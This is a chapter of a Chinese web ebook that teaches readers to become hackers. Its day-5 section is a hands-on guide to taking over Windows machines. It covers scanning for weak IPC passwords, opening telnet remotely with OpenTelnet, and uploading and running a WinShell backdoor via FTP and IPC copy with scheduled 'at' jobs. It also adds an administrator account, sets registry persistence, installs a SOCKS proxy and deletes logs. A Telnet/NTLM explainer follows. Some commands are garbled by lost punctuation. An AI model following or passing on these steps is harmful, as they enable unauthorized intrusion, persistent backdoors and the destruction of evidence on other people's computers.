贝壳电子书 > 文学历史电子书 > 30天打造专业红客 >

第5章

30天打造专业红客-第5章

小说: 30天打造专业红客 字数: 每页4000字

按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!



    继续讲,昨天有人说我找到个肉鸡,但不会用远程控制软件。先说用什么好呢
    我推荐Remote Administrator,有篇介绍它的文章很好:pcworld/2002/back_issues/2205/0533e。asp
    下载:skycn/soft/15592。html
    我想里面的说明你应该能很好理解的
    现在我以一个例子来说一下怎么获得一个肉鸡,虽然前面一直在说,但好象有点乱的,下面说的这个有点投机取巧的感觉,至少我这样觉得,不过因为很多朋友说都5天了,我什么都没搞到啊,所以只能。。
    第一步:扫描弱口令
    这里我用20cn开发的scanipc (这down。yqdown/xdown/yqdown0316/scanipc。rar有下的)
    不一会就会扫到很多有弱口令的主机
    (你可以拿你们学校的IP试试)
    这里我用opentelnet(远程启动TELNET的小东西,这里下:infosw/down/software。asp?id=1520)给扫描到开了空口令的主机开个端口让我们telnet连接上去
    ;开了23端口,并可以连接上的主机就不用进行次步骤了!
    Opentelnet使用方法:
    OpenTelnet。exe server    
    列如:
    C:》OpenTelnet。exe 192。168。1。2 administrator 123456 1 90 用户名:administrator 密码:123456 
    NTLM认证方式:1(也可以选择0请自己测试) 开的端口:90
    运行完,如果屏幕上出现 Disconnecting server。。。Successfully! 就说明已经成功。
    这样,我们就能够得到一个开90端口的Telnet服务器了。
    Telnet 192。168。1。2 90
    这样就可以登录上去了。
    第三步:配置并安装后门程序
    这里我选择WinShell(小巧精干我喜欢下载:hktk/soft/soft_server/winshell。html),用winshell主程序设置好后门,然后把后门程序传到台FTP空间上!
    列如:
    c:》ftp
    ftp》opencnwill
    然后输入用户名字 密码把后门传上去mput c:cnwill。exe
    现在我们登陆到肉鸡上 Telnet 192。168。1。2 90
    把刚上传的后门程序下载并运行(别忘记删除 后门程序)
    『后门也可以用net命令完成』
    net user 192。168。1。2 90ipc 〃〃 /user:〃administrator〃
    ' 建 立 IPC 连 接 '
    copy d:zilong。exe 192。168。1。2 90adminsystem32
    ' 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里'
    copy d:long。exe 192。168。1。2 90adminsystem32
    '上 传 一 个 删 除 日 志 程 序 到 对 方 的 主 机 里'
    copy d:scoks。exe 192。168。1。2 90adminsystem32
    ' 上 传 一 个 SCOKS 代 理 程 序 到 对 方 的 主 机 里'
    copy d:zilong。reg 192。168。1。2 90adminsystem32
    '上 传 导 入 注 册 表的 REG 文 件 到 对 方 的 主 机 里'请看后门说明
    net time 192。168。1。2 90
    ' 得 到 对 方 主 机 的 当 前 时 间'
    at 192。168。1。2 90 13:20 zilong。exe
    '用 a t命 令 执 行 我 们 的 后 门 程 序' 别 把 时 间 搞 错 了 哦
    
    如果大家用不习惯命令的话;那就用流光的IPC种植者吧;简单易用。这里就不赘述啦
    =
    telnet 192。168。1。2 90
    ' 从 我 们 设 置 的 后 门 程 序 登 陆 主 机 '
    net user  ****  /add
    '近来后添加一个用户名再说或者也可以选择激活guest' 
    net localgroup administrators ****  /add
    ' 把 自 己 添 加 到 管 理 组 里;这 样 我 们 就 是 超 级 管 理 员 了'
    regedit /s c:winntsystem32zilong。reg
    ' 把 后 门 程 序 导 入 注 册 表 的 启 动 项'这样做是防止被别人停止我们
    的后门服务程序;就算我们的后门服务程序被停止了;在主机重启动后我们的后门
    服务就又继续运行了。
    SOCKS …install
    ' 开 始 安 装 socks 代 理'
    SCOKS …config starttype 2
    ' 使 SOCKS 代 理 程 序 自 动 运 行,不 怕 肉 鸡 再 重 启 了'
    socks …config port 1080
    ' socks 代 理 端 口 设 置 为 1080 '
    net start skserver
    ' 启 动 SOCKS 代 理 服 务 '可以打开QQ设置IP代理了
    long
    ' 刚 才 上 传 的 一 个 删 除 日 志 程 序;运 行 它 就 可 以 了' 
    '第6天'从telnet讲起
    先说telnet;什么是telnet?Telnet服务虽然也属于客户机/服务器模型的服务,但它更大的意义在于实现了基于Telnet协议的远程登录(远程交互式计算),那么什么是远程登录?
    我想这个大家都明白一点;定义:远程登陆是指用户使用Telnet命令,使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器,它只负责把用户输入的每个字符传递给主机,再将主机输出的每个信息回显在屏幕上。
    使用Telnet协议进行远程登陆时需要满足以下条件:在本的计算机上必须装有包含Telnet协议的客户程序;必须知道远程主机的Ip地址或域名;必须知道登录标识与口令。
    Telnet远程登录服务分为以下4个过程:
    1)本地与远程主机建立连接。该过程实际上是建立一个TCP连接,用户必须知道远程主机的Ip地址或域名;
    2)将本地终端上输入的用户名和口令及以后输入的任何命令或字符以NVT(Net Virtual Terminal)格式传送到远程主机。该过程实际上是从本地主机向远程主机发送一个IP数据报;
    3)将远程主机输出的NVT格式的数据转化为本地所接受的格式送回本地终端,包括输入命令回显和命令执行结果;
    4)最后,本地终端对远程主机进行撤消连接。该过程是撤销一个TCP连接。
    再说一下什么叫Telnet协议?简单点说Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议。应用Telnet协议能够把本地用户所使用的计算机变成远程主机系统的一个终端。它提供了三种基本服务:
    1)Telnet定义一个网络虚拟终端为远的系统提供一个标准接口。客户机程序不必详细了解远的系统,他们只需构造使用标准接口的程序;
    2)Telnet包括一个允许客户机和服务器协商选项的机制,而且它还提供一组标准选项;
    3)Telnet对称处理连接的两端,即Telnet不强迫客户机从键盘输入,也不强迫客户机在屏幕上显示输出。
    关于这个就说这么多了;至于其他的一些就不说了;因为没什么帮助对我门;如果你有兴趣;可以去本站查查相关资料
    再说说Win2000的Telnet服务;因为大部分服务器用的都是2000的
    Win2000为我们提供了Telnet客户机和服务器程序:Telnet。exe是客户机程序(Client),tlntsvr。exe是服务器程序(server),同时它还为我们提供了Telnet服务器管理程序tlntadmn。exe。  其实从应用层面上,Win2000的Telnet服务并没有什么可说的,绝大部分内容你都可以从HELP文件中得到,我在此只是把它稍微整理一下而已。Windows 2000 默认安装了 Telnet 服务,但是并没有默认启动。下面给出HELP文件中 Telnet 服务的一部分默认设置:
    AllowTrustedDomain:是否允许域用户访问。默认值是1,允许信任域用户访问。可以改为0: 不允许域用户访问(只允许本地用户)。
    DefaultDomain:可以对与该计算机具有信任关系的任何域设置。默认值是〃。〃。
    DefaultShell:显示 shell 安装的路径位置。默认值是: %systemroot%System32Cmd。exe /q /k 
    MaxFailedLogins:在连接终止之前显示尝试登录失败的最大次数。默认是3。
    LoginScript:显示 Telnet 服务器登录脚本的路径位置。默认的位置就是“%systemroot%System32login。cmd”,你可以更改脚本内容,这样登录进Telnet的欢迎屏幕就不一样了。
    NTLM:NTLM身份验证选项。默认是2。可以有下面这些值:
    0: 不使用 NTLM 身份验证。
    1: 先尝试 NTLM 身份验证,如果失败,再使用用户名和密码。
    2: 只使用 NTLM 身份验证。
    TelnetPort:显示 telnet 服务器侦听 telnet 请求的端口。默认是:23。你也可以更改为其他端口。
    以上各项设置你可以使用tlntadmn。exe(Telnet服务器管理程序)来进行非常方便的配置,配置后需要重新启动Telnet服务。如图1
    2 NTLM
    提到了telnet就不能不提NTLM,我想这也是让入侵者最为头痛的一件事,哪怕你获得了管理员帐号和密码,想简单通过NTLM也并非易事,况且win2000中的telnet默认仅以NTLM方式验证身份,这就让我们不得不关注NTLM这个东东,那么什么是NTLM呢?
    早期的SMB协议在网络上明文传输口令,后来出现了〃LAN Manager Challenge/Response〃验证机制,简称LM,它十分简单以至很容易被破解,微软随后提出了WindowsNT挑战/响应验证机制,即NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。NTLM工作流程是这样的:
    1、客户端首先在本地加密当前用户的密码成为密码散列
    2、客户端向服务器发送自己的帐号,这个帐号是没有经过加密的,明文直接传输
    3、服务器产生一个16位的随机数字发送给客户端,作为一个 challenge(挑战) 
    4、客户端再用加密后的密码散列来加密这个 challenge ,然后把这个返回给服务器。作为 response(响应) 
    5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西,发送域控制器
    6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列,然后使用这个密码散列来加密 challenge。
    7、域控制器比较两次加密的 challenge ,如果一样,那么认证成功。
    从上面的过程我们可以看出,NTLM是以当前用户的身份向Telnet服务器发送登录请求的,而不是用你扫到的对方管理员的帐户和密码登录,显然,你的登录将会失败。举个例子来说,你家的机器名为A(本地机器),你入侵的机器名为B(远地机器),你在A上的帐户是xinxin,密码是1234,你扫到B的管理员帐号是Administrator,密码是5678,当你想Telnet到B时,NTLM将自动以当前用户的帐号和密码作为登录的凭据来进行上面的7项操作,即用xinxin和1234,而并非用你扫到的Administrator和5678,且这些都是自动完成的,根本不给你插手的机会,因此你的登录操作将失败。
    由于Telnet服务器对NTLM的使用有3个选项,所以当你Telnet远地机器时,会显示下面情况中的一种:
    1)身份验证选项=0时
    =
    Microsoft (R) Windows (TM) Version 5。00 (Build 2195)
    Wele to Microsoft Telnet Service
    Telnet Server Build 5。00。99201。

返回目录 上一页 下一页 回到顶部 0 0

你可能喜欢的